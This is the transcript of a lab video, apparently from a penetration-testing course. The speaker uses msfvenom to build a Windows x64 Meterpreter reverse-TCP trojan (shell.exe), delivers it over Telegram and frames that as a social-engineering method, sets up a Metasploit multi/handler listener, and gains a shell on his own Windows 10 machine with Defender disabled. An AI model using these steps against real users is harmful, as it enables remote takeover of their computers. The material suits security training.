Okay, great. In the previous videos, we talk about and we attack machines that have some vulnerabilities inside of them, whether it has vulnerability, an outdated software, or weak credentials. You manage to exploit them through those vulnerabilities and gain access to them. But now, let's see what happens if our target doesn't have any known vulnerability. In this case, what we will do is we want to deliver the payload to the target and execute it just while the target had a vulnerability. We did this through an exploit, and through that vulnerability we managed to execute the payload by ourselves. The way we can deliver the payload by ourselves can be through emails, HTTP page, or USB drive. And that payload has to reach the target and should be executed by clicking and running it by ourselves. For this case, I will use Kali Linux machine to create the payload and execute it on my main Windows 10 machine. But just one thing we have to be sure is Windows Defender and antivirus software should be turned off. Why? Well, we are going to be creating a payload using the Metasploit framework, using the Msfvenom tool, and most of the time people tend to use this tool to create payloads, and these payloads are well known to every antivirus software, and this will get detected quickly. So first thing we have to do is we have to turn off our Windows Defender, in which it is our Windows 10 target system. So go ahead to your target system and just turn off the real-time protections and the Windows Defender. So let me go to this minus settings. I'm gonna click it off. Okay, and also the firewalls. And also we have to turn off the Windows Defender. Okay, we have turned it off. And now let's create our Trojan, and as I have said, we will use the Msfvenom tool. And this tool is a known tool used to generate payloads real fast. You will see in just one command we'll be able to generate a program that gain access to the target system. So let me get back to my Kali Linux machine and just type Msfvenom. As you can see, we have the options and the usage examples right here. We can type in user bin Msfvenom -p and so on and so on. But you can just type Msfvenom and the rest of the options. Let me clear this. So the command will be Msfvenom -p, which stands for payload, and I'm gonna be creating a Windows payload since I'm attacking a Windows machine. So it's going to be Windows/x64 since it is a 64-bit machine. Meterpreter /reverse_tcp, and after that it is lhost, which is localhost, and this is going to be our Kali Linux IP address. And let me check my IP address. If this is my IP address, .88.249, and L port. You can choose any port in which the connection will be established, and I'll choose 555. And after that -F, which is for file type, and since we are attacking Windows machine, it has to be an exe file. And last -O, which is the output, and this will be our file name, and I'll call it shell.exe, and it has to be sudo. I'm going to enter my password, and let's wait for it to finish to create the payload. Okay, it has created the payload and it is saved in the home directory. So if I type ls here, as you can see, our payload is made and ready to be executed in the target system. So to move it to the target or to deliver it, you can choose whatever you want. You can choose through USB, through HTTP page, or something else. But for my part, I will choose through Telegram because this can be helpful in creating attacks through social engineering. So I'll use Telegram, and I will choose to download it from my Telegram page through my Windows host machine. So I'm gonna go ahead and just type Telegram. I have it right here. Okay, it's open right now. So let me try to copy and paste right here first. So this is my payload. I'm gonna copy and send it through from my Kali Linux machine to my Windows host machine. And if I go ahead to my Windows 10 machine, try to copy it to my desktop. By the way, let me close this first. Okay, it is done. I just want to make sure whether I have turned off my protection or not, and also let me try to Windows Defender, and also this one. I just want to make sure that our payload should be open. Okay, so I'm gonna download my save. I'm gonna save it on the desktop. Okay, it saves on the desktop. Let me get back to my desktop in which the shell is. So this shell right here will try to connect to our Kali Linux machine. Once executed, since it is a reverse shell, and it connect on port 555 just when we created the payload. In order for the connection to be established, you must be listening on the port, and we have to open it in order for target to even able to connect back to us. This is something the Metasploit framework automatically configured for us, but now we must do it manually, and we can do it with the help of the Metasploit frame console. So let me get back to my Kali Linux machine, and if I type msf console, as I've said, we will try to establish a connection in which the port will listen to, or the shell will try to listen to. Okay, the MSF console is open. So if I type use exploit multi / handler, this will try to establish a connection. So this is not an actual exploit. You can take it as something that will listen for the incoming connection, and it's also called the listener. So if I type enter here, and if I type show info, this module is sub that provides all the features in the operating system. The exploits that happen outside the framework. And if I type show options, the payload is this one, but we have to change to the preface that we have made it through the Msfvenom. So we just type set payload to be Windows /meter and reverse TCP. Let me check if the specs are correct. Meterpreter reverse TCP. So I'm gonna set up the payload to this one, and also we have to set our lhost. So set lhost to be the IP address of our Kali Linux machine. Sorry, .88.249. And the L port, we have to set it to the one that we made, which is the 555. And if I type show options again, we can see our lhost setup and our L port is set up. And if I run it, it will start a reverse TCP, but this will not open the Meterpret shell because we haven't established the connection. To do this, you have to open our shell or run it. As we have said, in order for this to work, the payload have to be run it and executed. So if I go ahead and open it in my Windows 10 machine, and of course it tells us Windows protect your PC, Microsoft Defense Mask can prevent it and recognize app from starting. Run this app might put your risk at risk. If I type C and just type run anyway, you can see nothing will happen. But if I go back again to my Kali Linux, of course the Meterpret shell is not opened. But let me try to run it again. I forgot to add the x64 for our payload. So if I type show options right here, I have to change. I forgot to add the x64. So if I type set payload to Windows x64 to Meterpreter / reverse underscore TCP. Let me check the spelling again. Meterpreter reverse TCP and press enter and show options. You can see all of it is correct. And if I type run again, it will start reverse TCP handler. And if I run it again, voila, it has opened a shell right here, and we gained a Meterpreter shell in our target system. So if I type help right here, we can see all the commands that we can do with our target. If I open shell again on the Windows, and if I type dir, as you can see, these are the files that are on my desktop. And if I type if IP, not if config, ipconfig, since it is a Windows machine, ipconfig, you can see we got the result right here, which is the IP address of my Windows machine and so on. So this is our first video on how to create Msfvenom, and in the next part we will see different types how we can create payloads and how we can use the Meterpreter shell, and see you in the next video.